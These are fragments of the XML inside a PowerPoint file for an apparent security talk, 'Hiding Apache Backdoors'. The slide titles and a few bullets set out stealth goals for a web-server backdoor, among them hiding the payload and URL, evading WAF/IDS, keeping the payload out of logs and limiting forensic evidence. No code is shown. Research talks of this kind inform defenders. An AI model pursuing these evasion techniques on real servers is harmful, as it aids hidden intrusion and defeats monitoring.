              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>filesystem</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRP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7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:cs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2214563"/>
            <a:ext cx="8883059" cy="3878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763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Objective: Hidden </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>payload</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Keep the payload out of the logs</a:t>
            </a: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8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:cs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66938"/>
            <a:ext cx="8786152" cy="3926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763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pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Objective: Avoid </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>WAF/IDS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33794" name="Content Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Ensure WAF/IDS cannot inspect the payload</a:t>
            </a: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C2D4762-26EE-4715-BE68-4A91436B42F5}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr fontAlgn="base">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:cs typeface="Arial"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66938"/>
            <a:ext cx="8786152" cy="3926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763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nd Content">
  <a:themeElements>
    <a:clrScheme name="BAE Systems">
      <a:dk1>
        <a:sysClr val="windowText" lastClr="000000"/>
      </a:dk1>
      <a:lt1>
        <a:sysClr val="window" lastClr="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="EB6E08"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="727A7F"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="001946"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="0062A1"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="727A7F"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="BDC1C4"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="008887"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="009534"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="6E1873"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="B832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1274</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>217</Paragraphs>
  <Slides>27</Slides>
  <Notes>13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Title and Content</vt:lpstr>
      <vt:lpstr>Hiding Apache Backdoors</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>About me</vt:lpstr>
      <vt:lpstr>Proposal</vt:lpstr>
      <vt:lpstr>Stealth objective</vt:lpstr>
      <vt:lpstr>Objective: No bad function calls</vt:lpstr>
      <vt:lpstr>Objective: Hidden file</vt:lpstr>
      <vt:lpstr>Objective: Hidden payload</vt:lpstr>
      <vt:lpstr>Objective: Avoid WAF/IDS</vt:lpstr>
      <vt:lpstr>Objective: Hidden url</vt:lpstr>
      <vt:lpstr>Objective: Limited forensic evidence</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>Stealth implementation</vt:lpstr>
      <vt:lpstr>Implementing: No bad function calls</vt:lpstr>
      <vt:lpstr>Implementing: Hidden file</vt:lpstr>
      <vt:lpstr>Implementing: Hidden payload</vt:lpstr>
      <vt:lpstr>Implementing: Avoid WAF/IDS</vt:lpstr>
      <vt:lpstr>Implementing: Hidden url</vt:lpstr>
      <vt:lpstr>Implementing: Limited forensic evidence</vt:lpstr>
      <vt:lpstr>Implementing: Limited forensic evidence</vt:lpstr>
      <vt:lpstr>Bringing it all together</vt:lpstr>
      <vt:lpstr>Implementing: Accessing the shell</vt:lpstr>
      <vt:lpstr>DEMO</vt:lpstr>
      <vt:lpstr>Parting notes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2012-05-11T08:16:54Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2013-05-03T01:39:18Z</dcterms:modified>
</cp:coreProperties>
</file>